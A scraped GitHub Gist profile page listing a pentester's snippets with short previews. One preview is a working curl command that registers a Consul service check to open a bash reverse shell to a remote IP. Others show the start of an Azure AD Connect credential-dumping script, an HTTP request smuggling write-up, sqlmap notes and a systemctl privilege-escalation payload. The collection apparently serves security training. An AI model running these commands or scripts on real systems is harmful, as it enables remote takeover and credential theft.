Movatterモバイル変換


[0]ホーム

URL:


Skip to content
Search Gists
Sign in Sign up

Instantly share code, notes, and snippets.

View A1vinSmith's full-sized avatar
🎯
OSCE3

Alvin Smith A1vinSmith

🎯
OSCE3
View GitHub Profile
@A1vinSmith
A1vinSmith /CompleteDiscordQuest.md
CreatedNovember 18, 2025 03:16— forked fromaamiaa/CompleteDiscordQuest.md
Complete Recent Discord Quest

Note

This does not works in browser for quests which require you to play a game! Use thedesktop app to complete those.

How to use this script:

  1. Accept a quest under Discover -> Quests
  2. PressCtrl+Shift+I to open DevTools
  3. Go to theConsole tab
  4. Paste the following code and hit enter:
@A1vinSmith
A1vinSmith /panw-exclusions.json
CreatedSeptember 22, 2025 19:17— forked fromUNC1739/panw-exclusions.json
Default TLS Exclusions for Palo Alto Networks Firewalls
{
"type": "rpc",
"tid": "32",
"action": "PanDirect",
"method": "execute",
"predefinedCacheUpdate": "false",
"cloudCacheUpdate": "false",
"result": {
"result": {
"entry": [
@A1vinSmith
A1vinSmith /osed-rp-helper.ps1
CreatedJune 9, 2025 11:06— forked from2S1one/osed-rp-helper.ps1
RP powershell wrapper
$max_depth=6
$rp_exe_path="C:\tools\rp-win-x86.exe"
$out_dir=Join-Path (Get-Location)"rp_output"
$all_prefix="all_"
$target_files=$args
# Ensure the output directory exists
New-Item-ItemType Directory-Path$out_dir-Force-ErrorAction SilentlyContinue|Out-Null
@A1vinSmith
A1vinSmith /xrandr.sh
CreatedSeptember 22, 2024 23:28— forked fromchirag64/xrandr.sh
Added license on user request
#!/bin/bash
# Copyright © 2021 Chirag Bhatia
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the “Software”), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOF
@A1vinSmith
A1vinSmith /revshell.sh
Last activeJune 12, 2025 18:06
Hashicorp Consul services API RCE & The simplest version of exploitation
curl --header"X-Consul-Token: XX-<SNIP>-XX" \
-X PUT \
-H"Content-Type: application/json" \
-d'{"Address": "127.0.0.1", "check": {"Args": ["/bin/bash", "-c", "bash -i >& /dev/tcp/10.10.10.10/80 0>&1"], "interval": "10s", "Timeout": "864000s"}, "ID": "alvinID01", "Name": "alvinName01", "Port": 80}' \
http://127.0.0.1:8500/v1/agent/service/register
@A1vinSmith
A1vinSmith /README.md
CreatedJanuary 20, 2023 01:53— forked fromcrypticmind/README.md
Setup lambda + API Gateway using localstack
@A1vinSmith
A1vinSmith /azuread_decrypt_msol_v2.ps1
CreatedJanuary 16, 2023 04:37— forked fromxpn/azuread_decrypt_msol_v2.ps1
Updated method of dumping the MSOL service account (which allows a DCSync) used by Azure AD Connect Sync
Write-Host"AD Connect Sync Credential Extract v2 (@_xpn_)"
Write-Host"`t[ Updated to support new cryptokey storage method ]`n"
$client=new-object System.Data.SqlClient.SqlConnection-ArgumentList"Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync"
try {
$client.Open()
}catch {
Write-Host"[!] Could not connect to localdb..."
return
@A1vinSmith
A1vinSmith /haproxy-smuggling.md
CreatedJanuary 10, 2023 04:33— forked fromndavison/haproxy-smuggling.md
HAProxy HTTP request smuggling

The following describes a technique to achieve HTTP request smuggling against infrastructure behind a HAProxy server when using specific configuration around backend connection reuse. This was tested against HAProxy versions 1.7.9, 1.7.11, 1.8.19, 1.8.21, 1.9.10, and 2.0.5. Of all these tested versions, only 2.0.5 was not vulnerable out of the box, although it is when using theno option http-use-htx configuration, which reverts back to the legacy HTTP decoder. 2.1 removed the legacy decoder so it is not affected.

To actually exploit HTTP smuggling using the issue described in this writeup, the backend server(s) behind HAProxy would also have to be vulnerable in the sense they too would need to suffer from a bug, but one which parses and accepts a poorly formed Transfer-Encoding header (almost certainly violating RFC7230), and allows HTTP keep-alive.

This is how HAProxy handles a request when Transfer-Encoding and Content-Length is p

@A1vinSmith
A1vinSmith /sqlmap-cheatsheet.md
Last activeJune 12, 2025 18:07
The beat cheatsheet for sqlmap
--batch # Use default config, make the injection process run automatically, without user input.--threads 5 -r # uses the intercepted request you saved earlier like burp save the item

Run Save item from Burp

sqlmap -r save.item
@A1vinSmith
A1vinSmith /Privilege Escalation.md
Last activeNovember 15, 2025 02:24
Privilege Escalation: Systemctl (Misconfigured Permissions — sudo/SUID)

https://alvinsmith.gitbook.io/progressive-oscp/untitled/vulnversity-privilege-escalation

0. Prepare your payloadroot.service

[Unit]Description=roooooooooot[Service]Type=simple

[8]ページ先頭

©2009-2025 Movatter.jp